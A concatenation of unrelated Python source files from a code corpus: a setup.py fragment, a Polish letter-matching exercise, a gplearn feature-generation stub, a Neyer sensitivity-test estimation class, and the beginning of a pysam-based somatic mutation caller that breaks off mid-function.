'author': 'Basit',
'author_email': '<EMAIL>',
'maintainer': '<NAME>',
'maintainer_email': '<EMAIL>',
'url': 'https://github.com/codesyncapp/codesync.git',
'packages': packages,
'package_data': package_data,
'entry_points': entry_points,
'python_requires': '>=3.9,<3.10',
'include_package_data': True
}
setup(**setup_kwargs)
| StarcoderdataPython |
5043196 | n = int(input("> "))
odpowiedzi = [[] for x in range(n)]
def mozna_stworzyc(literki: list, slowo: str) -> bool:
lst = []
for l in slowo:
if l.upper() in literki:
literki.remove(l.upper())
lst.append(True)
else:
lst.append(False)
return all(lst)
for i in range(n):
x, y = input("Wpisz x oraz y: ").split()
zbior = input("Wpisz zbiór liter: ").split()
for j in range(int(y)):
slowo = input(f"Wpisz slowo nr. {j + 1}: ")
mozna = mozna_stworzyc(zbior.copy(), slowo)
if mozna:
odpowiedzi[i].append("TAK")
else:
odpowiedzi[i].append("NIE")
for odp in odpowiedzi:
for x in odp:
print(x)
print() | StarcoderdataPython |
3539084 | <reponame>wu-uw/OpenCompetition
import pandas as pd
from sklearn import datasets
from gplearn.genetic import SymbolicTransformer
from sklearn.model_selection import train_test_split
# def data_prepare():
# boston = datasets.load_boston()
# boston_feature = pd.DataFrame(boston.data, columns=boston.feature_names)
# boston_label = pd.Series(boston.target).to_frame("TARGET")
# boston = pd.concat([boston_label, boston_feature], axis=1)
# return boston
#
# data = data_prepare()
#
# function_set = ['add', 'sub', 'mul', 'div', 'log', 'sqrt', 'abs', 'neg', 'max', 'min']
#
# gp1 = SymbolicTransformer(generations=10, population_size=1000,
# hall_of_fame=100, n_components=10,
# function_set=function_set,
# parsimony_coefficient=0.0005,
# max_samples=0.9, verbose=1,
# random_state=0, n_jobs=3)
#
# x_train, x_test, y_train, y_test = train_test_split(data, data.TARGET, test_size=0.2, random_state=10)
#
# gp_train_feature = gp1.transform(x_train)
# gp_test_feature = gp1.transform(x_test)
#
# train_idx = x_train.index
# test_idx = x_test.index
#
# new_feature_name = [str(i)+'V' for i in range(1, 11)]
# train_new_feature = pd.DataFrame(gp_train_feature, columns=new_feature_name, index=train_idx)
# test_new_feature = pd.DataFrame(gp_test_feature, columns=new_feature_name, index=test_idx)
# x_train_0 = pd.concat([x_train, train_new_feature], axis=1)
# x_test_0 = pd.concat([x_test, test_new_feature], axis=1)
#
# new_x_data = pd.concat([x_train_0, x_test_0], axis=0)
# new_data = pd.concat([data['TARGET'], new_x_data], axis=1)
# #print(new_data.columns)
class GPConfig:
def __init__(self, generation=1000, population_size=5000, hall_of_fame=100, n_components=10,
parsimony_coefficient=0.0005, max_samples=0.9):
self.generation = generation
self.population_size = population_size
self.hall_of_fame = hall_of_fame
self.n_components = n_components
self.parsimony_coefficient = parsimony_coefficient
self.max_samples = max_samples
self.function_set = ['add', 'sub', 'mul', 'div', 'log', 'sqrt', 'abs', 'neg', 'max', 'min']
def gp_feature_generator(df_train, df_test, y_name, var_list, gp_config):
pass
| StarcoderdataPython |
3213389 | <filename>senpy/neyer.py
# -*- coding: utf-8 -*-
import numpy as np
from scipy.optimize import minimize, brute, fmin
from .confidence import (parametric_bootstrap, nonparametric_bootstrap,
delta, contour_walk, increase_bounds,
HomogeneousResult)
from .plotting import plot_probability as pp, plot_confidence_region as pcr
import copy
from .utils import (custom_log, _round, check_bounds, check_diff,
check_success, check_fail)
class Neyer():
"""
The Neyer model. Given an assumed form for the latent distribution,
either 'normal', 'logistic', or 'log-logistic', the maximum likelihood
estimates of the distribution parameters are computed. Neyer also provides
a sequential design algorithm.
Parameters
----------
latent : string, optional
DESCRIPTION. The form of the latent distribution. Either 'normal',
'logistic', or 'log-logistic'. The default is 'normal'.
inverted : boolean, optional
DESCRIPTION. If the probability of a 'go' increases as the stimulus
level decreases, then the data is 'inverted'. The default is False.
method : string, optional
DESCRIPTION. Name of the optimization routine called when computing
the maximum likelihood estimates. The default is 'L-BFGS-B'.
num_restarts : int, optional
DESCRIPTION. The number of random initializations to use when
maximizing the likelihood function. Note, the available latent
distributions only use two parameters. Consequently, the resulting
likelihood function is typically convex. The default is 3.
t1_min : flaot, optional
DESCRIPTION. When using the sequential design algorithm and starting
with no (or minimal) data, an intial guess on the lower bound of
the first parameter, theta_1, is required. For the normal and
logistic distributions theta_1 is mu. For the log-logistic distribution
theta_1 is alpoha. If None is provided and the sequential algorithm
is called, the program will prompt the user for the value.
The default is None.
t1_max : float, optional
DESCRIPTION. The initial guess for the upper bound of theta_1.
See t1_min for more details. The default is None.
t2_guess : float, optional
DESCRIPTION. The initial guess for theta_2. Required when using the
sequential design algorithm. See t1_min for more details. For the
normal and logisit distributions, theta_2 is sigma. For the log-logistic
distribution, theta_2 is beta. The default is None.
precision : int, optional
DESCRIPTION. Number of decimal points to incude in the final
output. The default is 8.
resolution : float, optional
DESCRIPTION. The smallest change in stimulus level available. For
example, a drop-weight apparatus may only have adjustments at
quarter inch intervals. Thus, the algorithm should not suggest testing
at 12.105 inches, etc. The default is None.
lower_bound : float, optional
DESCRIPTION. The lowest stimulus level a user can phsically test.
The default is None.
upper_bound : float, optional
DESCRIPTION. The highest stimulus level a user can phsically test.
The default is None.
hist : boolean, optional
DESCRIPTION. If True the determinant of the information matrix is
computed over a range of stimulus levels at each stage of the
sequential design. Typically used for debugging only!
The default is False.
log_file : str, optional
DESCRIPTION. File path for a log file. The log consists of the
steps taken during the sequential design algorithm.
The default is None.
"""
available_opt_methods = ('L-BFGS-B', 'SLSQP', 'TNC')
def __init__(self, latent='normal', inverted=False,
method='L-BFGS-B', num_restarts=3,
t1_min=None, t1_max=None, t2_guess=None,
precision=8, resolution=None,
lower_bound=None, upper_bound=None,
hist=False, log_file=None):
self.inverted = inverted
self.theta = None
self.latent = latent
self.method = method
self.num_restarts = num_restarts
if self.num_restarts < 1:
print('Number of restarts must be greater than or eqaul to 1.')
print('Defaulting to 3.')
self.num_restarts = 3
if self.method not in self.available_opt_methods:
print("""method '{}' not understood.
Defaulting to L-BFGS-B.
Please choose from {}""".format(self.method,
self.available_opt_methods))
self.method = 'L-BFGS-B'
if latent == 'normal':
from .norm_funcs import function_dictionary
elif latent == 'logistic':
from .logistic_funcs import function_dictionary
elif latent == 'log-logistic':
from .log_logistic_funcs import function_dictionary
else:
raise ValueError("""Value for "latent" not understood.
Must be "normal", "logistic", or "log-logistic".""")
self.pred = function_dictionary['pred']
self.opt_config = function_dictionary['opt_config']
self.cost_func = function_dictionary['cost']
self.cost_deriv = function_dictionary['cost_deriv']
self.est_names = function_dictionary['estimate_names']
self.Hessian = function_dictionary['Hessian']
self.cdf_deriv = function_dictionary['cdf_deriv']
self.info = function_dictionary['info']
self.precision = precision
self.start = True
self.binary = True
self.overlap = True
self.mle = True
self.lower_bound = lower_bound
self.upper_bound = upper_bound
self.hist = hist
if isinstance(log_file, str):
self.log_file = log_file
file_obj = open(log_file, 'w')
file_obj.close()
if resolution != None:
self.resolution = resolution
if self.hist == True:
self.det_vals = []
self.det_res = []
self.x_pts = []
self.t1_min = t1_min
self.t1_max = t1_max
self.t2_guess = t2_guess
self.X = np.asarray([]).reshape((-1,1))
self.Y = np.asarray([]).reshape((-1,1))
self.theta = np.array([np.nan, np.nan])
self.observed_info = np.empty((2,2))
self.updated = -1
def fit(self, X, Y):
"""
Compute the maximum likelihood estimates of the distribution parameters.
Parameters
----------
X : 2D array
The tested stimulus levels. Must be of shape (n_pts, 1)
Y : array
The observed response at each stimulus level. 1 for 'go' and 0
for 'no-go'.
Returns
-------
self
"""
if X.ndim != 2:
raise ValueError("X must be of shape [n_examples, 1]")
if X.shape[0] != Y.shape[0]:
raise ValueError("""input and output must have the same number of rows!
shapes {} and {} do not match.""".format(X.shape, Y.shape))
Y = Y.reshape((-1,1))
self.Y = Y.copy()
self.X = X
if self.inverted:
Y = np.logical_not(Y).astype(int)
if check_success(Y) or check_fail(Y):
raise HomogeneousResult('Need to have positive AND negative responses present in the data in order to call fit.')
thetas = []
costs = []
t1_low, t1_high, t2_low, t2_high, bounds = self.opt_config(self.X)
for i in range(self.num_restarts):
theta_0 = [np.random.uniform(t1_low, t1_high),
np.random.uniform(t2_low, t2_high)]
theta_0 = np.array(theta_0)
res = minimize(self.cost_func, theta_0,
args = (self.X, Y),
method=self.method,
jac=self.cost_deriv,
bounds=bounds)
thetas.append(res.x)
costs.append(res.fun)
thetas = np.asarray(thetas)
costs = np.asarray(costs)
best_run = np.argmin(costs)
self.theta = thetas[best_run]
self.cost = costs[best_run]
return self
def get_estimators(self):
"""
Provides access to the stored estimate of theta. For example,
[mu, sigma] or [alpha, beta].
Returns
-------
array
Current parameter estimates. Shape is (2,)
"""
if self.theta is not None:
if check_diff(self.X, self.Y, self.inverted) > 0:
raise Exception('Not enough data to estimate theta.')
return self.theta
else:
raise Exception('Model not yet trained!')
def print_estimators(self, cost=False):
"""
Prints the current parameter estimates to the console.
Parameters
----------
cost : boolean, optional
If true, the value of the negative log-likelihood, or cost, at the
current parameter estimates is also printed to the console.
The default is False.
Returns
-------
None.
"""
if self.theta is not None:
if check_diff(self.X, self.Y, self.inverted) > 0:
raise Exception('Not enough data to estimate theta.')
t1n, t2n = self.est_names()
t1, t2 = self.theta
print('{}: {}\n{}: {}'.format(t1n, t1, t2n, t2))
if cost:
print('cost: {}'.format(self.cost))
else:
raise Exception('Model not yet trained!')
def predict_probability(self, pts=None, confidence=None,
CI_level = [.5, .8, .9, .95],
num_samples=1000, max_iter=5):
"""
Returns the probability of a 'go' at pts. p(y=0|pt)
Parameters
----------
pts : array, optional
The stimulus levels at which to compute probability predictions.
The default is None. If None, range = max(X) - min(X) and
pts = np.linspace(min(X)-0.5*range, max(X)+0.5*range, 100)
confidence : str, optional
The name of the method used to supply confidence intervals.
Options are 'delta', 'perturbation' (same as delta), 'likelihood-ratio',
'parametric-bootstrap', and 'nonparametric-bootstrap'.
The default is None.
CI_level : list, optional
The confidence levels. Ignored if confidence is None.
The default is [.5, .8, .9, .95].
num_samples : int, optional
The number of bootstrapped samples generated. Only used if
confidence = 'parametric-bootstrap' or 'nonparametric=bootstrap'.
The default is 1000.
max_iter : int, optional
The maximum number of attempts to map the likelihood ratio.
Only used if confidence = 'likelihood-ratio'. The default is 5.
Returns
-------
tuple
Consists of the stimulus points, the predicted probability, and
arrays of the lower bounds and upper bounds of the confidence levels
if confidence was requested.
(pts (n_pts, 1), predicted probability (n_pts, 1)) or
(pts (n_pts, 1), predicted probability (n_pts, 1), lower CI bounds, upper CI bounds)
where the shape of lower and upper CI bounds is (n_pts, n_levels)
"""
if self.theta is None:
raise Exception('Model not yet trained!')
if check_diff(self.X, self.Y, self.inverted) > 0:
raise Exception('Not enough data to make a prediction.')
if pts is None:
xmin = np.min(self.X)
xmax = np.max(self.X)
xint = xmax-xmin
xstart = xmin - xint*.05
xend = xmax + xint*.05
pts = np.linspace(xstart, xend, 100)
pts = np.array(pts).reshape((-1,1))
p = self.pred(pts, self.theta, self.inverted)
if confidence is None:
return pts, p
elif confidence == 'parametric-bootstrap':
current_model = copy.deepcopy(self)
lb, ub = parametric_bootstrap(current_model,
pts,
num_samples,
CI_level)
return pts, p, lb, ub
elif confidence == 'nonparametric-bootstrap':
current_model = copy.deepcopy(self)
lb, ub = nonparametric_bootstrap(current_model,
pts,
num_samples,
CI_level)
return pts, p, lb, ub
elif confidence == 'likelihood-ratio':
new_bounds = increase_bounds(self.opt_config(self.X),
'both', 'both')
lb, ub = contour_walk(self, pts, new_bounds, [100],
CI_level, max_iter)
return pts, p, lb, ub
elif confidence == 'delta' or confidence == 'perturbation':
lb, ub = delta(self,
pts,
num_samples,
CI_level, p)
return pts, p, lb, ub
else:
ci_methods = [None, 'parametric-bootstrap',
'nonparametric-bootstrap', 'likelihood-ratio',
'delta', 'perturbation']
raise ValueError("confidence '{}' not understood.\nPlease choose from {}".format(confidence, ci_methods))
def plot_probability(self, include_data=True, xlabel=None, ylabel=None,
alpha=1.0, save_dst=None, show=True, **kwargs):
"""
A high-level method to call self.predict_probability and plot the result.
Parameters
----------
include_data : boolean, optional
Whether or not to plot the data (stimuli and responses).
The default is True.
xlabel : str, optional
If provided, the text for the plot xlabel. The default is None.
ylabel : str, optional
If provided, the text for the plot ylabel. The default is None.
alpha : float, optional
opacity of the observed data points. Must be between 0 and 1.
Only used if include_data is True. Useful to visualize many overlapping
data points. The default is 1.0.
save_dst : str, optional
The file path (including file type) where the plot should be saved.
The default is None.
show : boolean, optional
If True, simply calls matplotlib.plt.show(). May be required for
some IDEs. The default is True.
**kwargs :
All keyworkd arguments provided to predict_probability can also be
provided here.
Returns
-------
None.
"""
pp(self, include_data, xlabel, ylabel,
alpha, save_dst, show, **kwargs)
def plot_confidence_region(self, limits, n, CI_levels=10,
save_dst=None, show=True):
"""
A high-level function to plot the confidence region of the parameters.
Parameters
----------
limits : list
The plot limits provided as [lower xlim, upper xlim, lower ylim, upper ylim].
n : int or list of length 2
The number locations to sample in the x (theta_1) and y (theta_2) directions.
CI_levels : int or list, optional
If an integer, a filled contour plot will be produced with that
many levels. If it is a list, the list values specify the confidence
levels at which to draw contour lines. The default is 10.
save_dst : str, optional
The file path (including file type) where the plot should be saved.
The default is None
show : boolean, optional
If True, simply calls matplotlib.plt.show(). May be required for
some IDEs. The default is True.
Returns
-------
None.
"""
if self.theta is None:
raise Exception('Model not yet trained!')
if check_diff(self.X, self.Y, self.inverted) > 0:
raise Exception('Not enough data to make a prediction.')
pcr(self, limits, n, CI_levels, save_dst, show)
def __prompt_input(self):
"""
If the sequential design algorithm is used and if there is 1) insufficent
data or 2) t1_min, t1_max, and t2_guess were not specifed, then prompt
the user for those values. Used internally. Should not be called.
Returns
-------
None.
"""
t1n, t2n = self.est_names()
self.t1_min = float(input('Lower bound guess for {}: '.format(t1n)))
self.t1_max = float(input('Upper bound guess for {}: '.format(t1n)))
self.t2_guess = float(input('Initial guess for {}: '.format(t2n)))
def __max_info(self, theta):
def det(level):
X_test = np.vstack((self.X, level))
info = self.info(X_test, theta[0], theta[1])
return -1*(info[0][0] * info[1][1] - info[0][1] * info[1][0])
ranges = self.max_s - self.min_s
if self.lower_bound == None and self.upper_bound == None:
res = brute(det, ((self.min_s - .5*ranges, self.max_s + .5*ranges),),
Ns=100, finish=fmin)
else:
if self.lower_bound == None:
lb = self.min_s - ranges
else: lb = self.lower_bound
if self.upper_bound == None:
ub = self.min_s + ranges
else: ub = self.upper_bound
res = brute(det, ((lb, ub),),
Ns=100, finish=fmin)
if self.hist:
if self.lower_bound == None:
x_pts = np.linspace(self.min_s - 2.5*ranges,
self.max_s + 2.5*ranges,
500)
else:
x_pts = np.linspace(self.lower_bound - .1 * ranges,
self.upper_bound + .1 * ranges,
500)
self.x_pts.append(x_pts)
d_res = []
for i in x_pts:
d_res.append(-1*det(np.asarray(i)))
self.det_vals.append(d_res)
self.det_res.append(float(res))
return float(res)
def __check_initial_theta(self):
if self.t1_max <= self.t1_min:
raise ValueError('t1_max cannot be less than t1_min!')
elif self.t2_guess <= 0:
raise ValueError('t2_guess must be positive!')
def next_pt(self):
"""
The sequential design algorithm. When this method is called, the next
suggested stimulus level for testing is printed to the console.
Returns
-------
self
"""
Y = self.Y.copy().astype(bool)
if self.inverted:
Y = np.logical_not(Y)
if self.start:
self.start = False
if self.X.size == 0:
custom_log(self, 'Starting Sequential Algorithm with No Data', True)
if (self.t1_min == None) or (self.t1_max == None) or (self.t2_guess == None):
self.__prompt_input()
self.__check_initial_theta()
self.nx = _round(self, (self.t1_min + self.t1_max) / 2.)
check_bounds(self, self.nx)
custom_log(self, 'Next Point Requested: {}'.format(self.nx))
self.updated = 0
return self.nx
else:
diff = check_diff(self.X, self.Y, self.inverted)
if diff > 0:
if (self.t1_min == None) or (self.t1_max == None) or (self.t2_guess == None):
print("""Even though data has been provided, overlap has not been achieved.
In this case it is necessary to provide parameters for t1_min, t1_max, and t2_guess.
""")
self.__prompt_input()
self.__check_initial_theta()
return self.next_pt()
else:
self.binary = False
self.overlap = False
return self.next_pt()
else:
if self.X.size > self.updated:
self.updated = self.X.size
else:
return self.nx
if self.binary:
self.max_s = np.max(self.X)
self.min_s = np.min(self.X)
custom_log(self, 'In Binary Search Section', True)
custom_log(self, 'Min Stimlus: {}'.format(self.min_s))
custom_log(self, 'Max Stimulus: {}'.format(self.max_s))
# all success case
if Y.size == np.sum(Y):
custom_log(self, 'In All Success Section', True)
t1 = (self.t1_min + self.min_s) / 2.
t2 = self.min_s - 2. * self.t2_guess
t3 = 2. * self.min_s - self.max_s
self.nx = _round(self, min(t1, t2, t2))
check_bounds(self, self.nx)
custom_log(self, 'Next Point Requested: {}'.format(self.nx))
return self.nx
# all failure case
if np.sum(Y) == 0:
custom_log(self, 'In All Failure Section', True)
t1 = (self.t1_max + self.max_s) / 2.
t2 = self.max_s + 2. * self.t2_guess
t3 = 2. * self.max_s - self.min_s
self.nx = _round(self, max(t1, t2, t3))
check_bounds(self, self.nx)
custom_log(self, 'Next Point Requested: {}'.format(self.nx))
return self.nx
self.min_go = np.min(self.X[Y])
self.max_no = np.max(self.X[np.logical_not(Y)])
self.diff = round(self.min_go - self.max_no, self.precision)
custom_log(self, 'Min Go: {}'.format(self.min_go))
custom_log(self, 'Max No-Go: {}'.format(self.max_no))
custom_log(self, 'Difference: {}'.format(self.diff))
custom_log(self, 'Theta 2 guess: {}'.format(self.t2_guess))
if self.diff > self.t2_guess:
self.nx = _round(self, (self.max_no + self.min_go) / 2.)
check_bounds(self, self.nx)
custom_log(self, 'Next Point Requested: {}'.format(self.nx))
return self.nx
else:
self.binary = False
if self.overlap:
custom_log(self, 'In Overlap Search Section', True)
self.min_go = np.min(self.X[Y])
self.max_no = np.max(self.X[np.logical_not(Y)])
self.diff = round(self.min_go - self.max_no, self.precision)
custom_log(self, 'Min Go: {}'.format(self.min_go))
custom_log(self, 'Max No-Go: {}'.format(self.max_no))
custom_log(self, 'Difference: {}'.format(self.diff))
custom_log(self, 'Theta 2 guess: {}'.format(self.t2_guess))
if self.diff > self.t2_guess:
custom_log(self, 'Reverting Back to Binary Search', True)
self.binary = True
self.updated = -1
return self.next_pt()
if self.diff < 0:
custom_log(self, '--- Overlap Achieved! ---', True)
self.overlap = False
else:
self.theta[0] = (self.max_no + self.min_go) / 2.
self.theta[1] = self.t2_guess
custom_log(self, 'Maximize Determinate With...')
t1n, t2n = self.est_names()
custom_log(self, '{}: {}'.format(t1n, self.theta[0]))
custom_log(self, '{}: {}'.format(t2n, self.theta[1]))
self.nx = _round(self, self.__max_info(self.theta))
self.t2_guess *= 0.8
check_bounds(self, self.nx)
custom_log(self, 'Next Point Requested: {}'.format(self.nx))
return self.nx
if self.mle:
custom_log(self, 'In Maximum Liklihood Section', True)
self.max_s = max(self.X)
self.min_s = min(self.X)
custom_log(self, 'Min Stimlus: {}'.format(self.min_s))
custom_log(self, 'Max Stimulus: {}'.format(self.max_s))
self.fit(self.X, self.Y)
t1n, t2n = self.est_names()
custom_log(self, 'Estimated {}: {}'.format(t1n, self.theta[0]))
custom_log(self, 'Estimated {}: {}'.format(t2n, self.theta[1]))
self.theta[0] = max(self.min_s, min(self.theta[0], self.max_s))
self.theta[1] = min(self.theta[1], self.max_s - self.min_s)
custom_log(self, 'Bounded Estimated {}: {}'.format(t1n, self.theta[0]))
custom_log(self, 'Bounded Estimated {}: {}'.format(t2n, self.theta[1]))
self.nx = _round(self, self.__max_info(self.theta))
check_bounds(self, self.nx)
custom_log(self, 'Next Point Requested: {}'.format(self.nx))
return self.nx
def post_test_outcome(self, res, pt):
"""
Append a stimulus level and result to the existing data.
Parameters
----------
res : int or boolean
The observed result at the tested stimulus level. Either 0, 1 or
False, True.
pt : float
The stimulus level at which the test was performed.
Returns
-------
None.
"""
if isinstance(res, bool) or (res == 0) or (res == 1):
self.X = np.vstack((self.X, pt))
custom_log(self, 'Tested Points: \n {}'.format(self.X.flatten()))
self.Y = np.vstack((self.Y, int(res)))
custom_log(self, 'Test Results: \n {}'.format(self.Y.flatten()))
else:
raise ValueError('Result must be \{0, 1\} or \{True, False\}!')
def loop(self, iterations=1000000):
"""
This method suggests new test levels and accepts user input to calculate
maximum likelihood estimates. That is, this method constitutes a loop.
Loop will continue indefinitely until 'end' is received as user input
during the either the test level or result input queries. Alternatively,
if a set number of specimens is to be used then the number of loops can
be specified with the 'iterations' keyword argument.
Parameters
----------
iterations : int, optional
End the loop automatically after n iterations. The default is 1000000.
Returns
-------
None.
"""
print('-'*50)
print("""If the level at which the test is performed is the same as the
suggested level, then the user can simply press enter (no need for input)
when queried about the test level.""")
print('\n')
print("""When the user does not wish to test any more levels,
input "end" (without quotes) when queried abou the next test.""")
print('-'*50)
print('\n')
for _ in range(iterations):
nx = self.next_pt()
print('Specimen number: {}'.format(self.X.size + 1))
print('The next suggested test point is: {}'.format(nx))
pt = input('Please input the level at which the test was performed: ')
pt = "".join(pt.split()).lower()
if pt == 'end':
break
elif pt == '':
pt = nx
else:
try:
pt = float(pt)
except:
print("Input level '{}' not understood. Try again. Type 'end' to terminate loop.".format(pt))
continue
res = input('Please input the result: ')
res = "".join(res.split()).lower()
print('\n')
if res == 'true' or res == '1':
self.post_test_outcome(1, pt)
elif res == 'false' or res == '0':
self.post_test_outcome(0, pt)
elif res == '':
pass
elif res == 'end':
break
else:
print("Result value '{}' not understood. Input must be 0 or False for a negative response and 1 or True for a positive response. Boolean inputs are not case sensitive. Try again. Type 'end' during input query to terminate loop.".format(res))
| StarcoderdataPython |
6416959 | <reponame>pongorlorinc/mcaller
import os
import optparse
import pysam
import sys
import numpy
import scipy
from scipy.stats import poisson
from scipy.stats import fisher_exact
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
parser = optparse.OptionParser()
parser.add_option('-g', '--ref',
action="store", dest="genome_file",
help="path to fasta (required)", default="NA")
parser.add_option('-b', '--bed',
action="store", dest="bed",
help="bed file (required)", default="NA")
parser.add_option('-i', '--in',
action="store", dest="bam",
help="bam files, semicolon \';\' separated (required)\n", default="NA")
parser.add_option('-o', '--out',
action="store", dest="out_folder",
help="output folder to store files (required)\n", default="NA")
parser.add_option('-y', '--coord', action='store_true',
help='treat bed as exact coordiantes (quicker if mutations are known)', dest="coord", default=0)
parser.add_option('-x', '--aln', type=int,
action="store", dest="min_alignment_score",
help="minimum alignment score", default=1)
parser.add_option('-s', '--reg', type=int,
action="store", dest="region_interval",
help="region size for noise calculation", default=10)
parser.add_option('-n', '--noise', type=int,
action="store", dest="noise",
help="noise probability", default=0.05)
parser.add_option('-t', '--ncont', type=int,
action="store", dest="normal_mut_thresh",
help="normal sample max contamination", default=1)
parser.add_option('-w', '--mincov', type=int,
action="store", dest="min_cov",
help="minimum coverage during analysis", default=5)
parser.add_option('-e', '--edit', type=int,
action="store", dest="max_read_edit_distance",
help="max edit distance", default=4)
parser.add_option('-c', '--covfilt', type=int,
action="store", dest="filter_coverage",
help="filter mutations where coverage was not reached by samples", default=100)
parser.add_option('-p', '--pval', type=int,
action="store", dest="background_p_thresh",
help="p-value cutoff", default=0.05)
parser.add_option('-q', '--qfreq', type=int,
action="store", dest="freq_filter_high_cov",
help="mutation frequency filter for high coverage regions", default=2)
parser.add_option('-f', '--freq', type=int,
action="store", dest="freq_thresh",
help="mutation frequency filter for non-high coverage regions", default=5)
parser.add_option('-u', '--ncov', type=int,
action="store", dest="min_norm_cov",
help="minimum reads in normal sample", default=5)
parser.add_option('-m', '--mut', type=int,
action="store", dest="min_somatic_mut",
help="minimum mutant reads in cancer sample", default=4)
parser.add_option('-a', '--indel', type=int,
action="store", dest="minimum_indel_mut",
help="minimum mutant reads supporting indel in cancer sample", default=4)
parser.add_option('-d', '--maxprox', type=int,
action="store", dest="prox_indel_mut_count",
help="maximum proximal reads with indel before mutation filtering", default=2)
parser.add_option('-j', '--indeldist', type=int,
action="store", dest="prox_indel_dist",
help="distance when looking for proximal indels", default=5)
parser.add_option('-k', '--proxfile', action='store_true',
help='(boolean) filter for proximal indels (0:no / 1:yes)', dest="proximal_indel_filter", default=1)
parser.add_option('-l', '--indnoise', type=int,
action="store", dest="indel_noise_freq",
help="default noise when calculating background", default=0.01)
options, args = parser.parse_args()
if(options.genome_file == "NA" or options.bed == "NA" or options.bam == "NA" or options.out_folder == "NA"):
parser.print_help()
sys.exit()
out_folder = options.out_folder
if not os.path.exists(out_folder):
os.makedirs(out_folder)
if options.genome_file.endswith(".fa"):
genome_file = options.genome_file
bamlist = list()
bamlist = options.bam.rstrip().split(',')
num_of_samples = len(bamlist)
print ("\n---------------------------------")
print ("mcaller: joint genotyping program")
print ("---------------------------------")
print ("Main parameters:\n")
print ("\tBAM files:\t%s" % bamlist)
print ("\tGenome:\t\t%s" % genome_file)
print ("\tOutfold:\t\"%s\"" % out_folder)
print ("\tBEDfile:\t%s" % options.bed)
print ("\n\nAdditional parameters:\n")
print ("\tTreat bed as coordinate: %d\n" %options.coord)
print ("\t(boolean) filter for proximal indels (0:no / 1:yes): %d" %options.proximal_indel_filter)
print ("\tDistance when looking for proximal indels: %d" %options.prox_indel_dist)
print ("\tMaximum proximal reads with indel before mutation filtering: %d\n" %options.prox_indel_mut_count)
print ("\tMinimum alignment score: %d" %options.min_alignment_score)
print ("\tMax edit distance in read: %d" %options.max_read_edit_distance)
print ("\tRegion size for noise calculation: %d" %options.region_interval)
print ("\tSequencing error probability: %d" %options.noise)
print ("\tNormal sample max contamination: %d" %options.normal_mut_thresh)
print ("\tMinimum coverage during analysis: %d\n" %options.min_cov)
print ("\tMutation p-value cutoff: %d" %options.background_p_thresh)
print ("\tMutation frequency filter for high coverage regions: %d" %options.freq_filter_high_cov)
print ("\tMutation frequency filter for low coverage regions: %d" %options.freq_thresh)
print ("\tMinimum mutant reads in (any) cancer sample: %d" %options.min_somatic_mut)
print ("\tMinimum mutant reads supporting indel in cancer sample: %d" %options.minimum_indel_mut)
print ("\tMinimum reads in normal sample to call germline mutation: %d" %options.min_norm_cov)
print ("\tFilter mutations where coverage was not reached by any samples: %d" %options.filter_coverage)
print ("---------------------------------\n")
input_coords = options.coord
bedlogfile = out_folder + "/entries_finished.bed"
bedloghandle = open(bedlogfile, "w+")
mutationfile = out_folder + "/mutations.txt"
mutationhandle = open(mutationfile, "w+")
mutationhandle.write("chr\tpos\tref\talt\tstatus\taccept\t%s\n" % ("\t".join(os.path.basename(bamlist[y]) for y in range(0, len(bamlist)))))
print ("Importing genome:")
records = SeqIO.to_dict(SeqIO.parse(open(genome_file), 'fasta'))
print ("\tfinished importing genome")
###################### VARIABLES ######################
base = dict()
rb = dict()
base["A"] = 0
base["C"] = 1
base["G"] = 2
base["T"] = 3
rb[0] = "A"
rb[1] = "C"
rb[2] = "G"
rb[3] = "T"
min_alignment_score = options.min_alignment_score
region_interval = options.region_interval
noise = options.noise
background_p_thresh = options.background_p_thresh
q_max = 42
q_m_height = 4 * 42
min_cov = options.min_cov
max_read_edit_distance = options.max_read_edit_distance
filter_coverage = options.filter_coverage
normal_mut_thresh = options.normal_mut_thresh
freq_filter_high_cov = options.freq_filter_high_cov
freq_thresh = options.freq_thresh
min_somatic_mut = options.min_somatic_mut
min_norm_cov = options.min_norm_cov
indel_noise_freq = options.indel_noise_freq
proximal_indel_filter = options.proximal_indel_filter
prox_indel_dist = options.prox_indel_dist
prox_indel_mut_count = options.prox_indel_mut_count
minimum_indel_mut = options.minimum_indel_mut
###################### VARIABLES ######################
def get_edit_distance(read, in_chr, start, g_m_start, m_end, mismatch):
edit_distance = 0
genome_pos = read.reference_start
read_pos = 0
for (cigarType,cigarLength) in read.cigartuples:
if cigarType == 0: #MATCH bases in read (M cigar code)
genome_end = genome_pos + cigarLength
read_end = read_pos + cigarLength
ref_seq = records[in_chr].seq[genome_pos:genome_end].upper()
read_seq = read.query_sequence[read_pos:read_end]
frag_len = len(ref_seq)
for i in range(0, frag_len):
t_g_pos = genome_pos + i - g_m_start
if read_seq[i] in base:
if t_g_pos < m_end:
if ref_seq[i] != read_seq[i]:
mismatch[t_g_pos] += 1
edit_distance += 1
genome_pos = genome_end
read_pos = read_end
elif cigarType == 1: #INS in read (I cigar code)
t_g_pos = genome_pos - g_m_start
read_end = read_pos + cigarLength
read_pos = read_end
edit_distance += 1
for x in range(-2, 2):
temp_pos = t_g_pos + x
if temp_pos < m_end:
mismatch[temp_pos] += 1
elif cigarType == 2: #DELETION in read (D cigar code)
t_g_pos = genome_pos - g_m_start
genome_end = genome_pos + cigarLength
genome_pos = genome_end
edit_distance += 1
for x in range(-2, 2):
temp_pos = t_g_pos + x
if temp_pos < m_end:
mismatch[temp_pos] += 1
elif cigarType == 3: #SPLICED region in read representing numer of skipped bases on reference (N cigar code)
genome_pos += cigarLength #jump to next coordinate by skipping bases
elif cigarType == 4: #SOFTCLIP
read_pos += cigarLength
else:
pass
return edit_distance, mismatch
#Input: pysam read type, which contains read information and ref_name (chromosome name where read aligned)
#Output: Boolean, True is read accepted, False if rejected
def accept_read(in_read):
if in_read.mapping_quality < min_alignment_score:
return 0
if in_read.is_duplicate:
return 0
if in_read.reference_id < 0:
return 0
if in_read.next_reference_id < 0:
return 0
if in_read.reference_name != in_read.next_reference_name:
return 0
if in_read.cigartuples is None:
return 0
if in_read.cigartuples[0][0] == 5 or in_read.cigartuples[-1][0] == 5:
return 0
return 1
def import_reads(in_chr, start, end, samfile, g_m_start, m_end, mismatch, reads):
for read in samfile.fetch(in_chr, start, end):
if accept_read(read) == 1:
edit_distance, mismatch = get_edit_distance(read, in_chr, start, g_m_start, m_end, mismatch)
if edit_distance < max_read_edit_distance:
reads.append(read)
return reads, mismatch
def import_data(reads, coverage, base_array, r_q_matrix, f_q_matrix, m_array, in_chr, g_m_start, m_end, active_pos, indels, s_num, indarray, mismatch):
for read in reads:
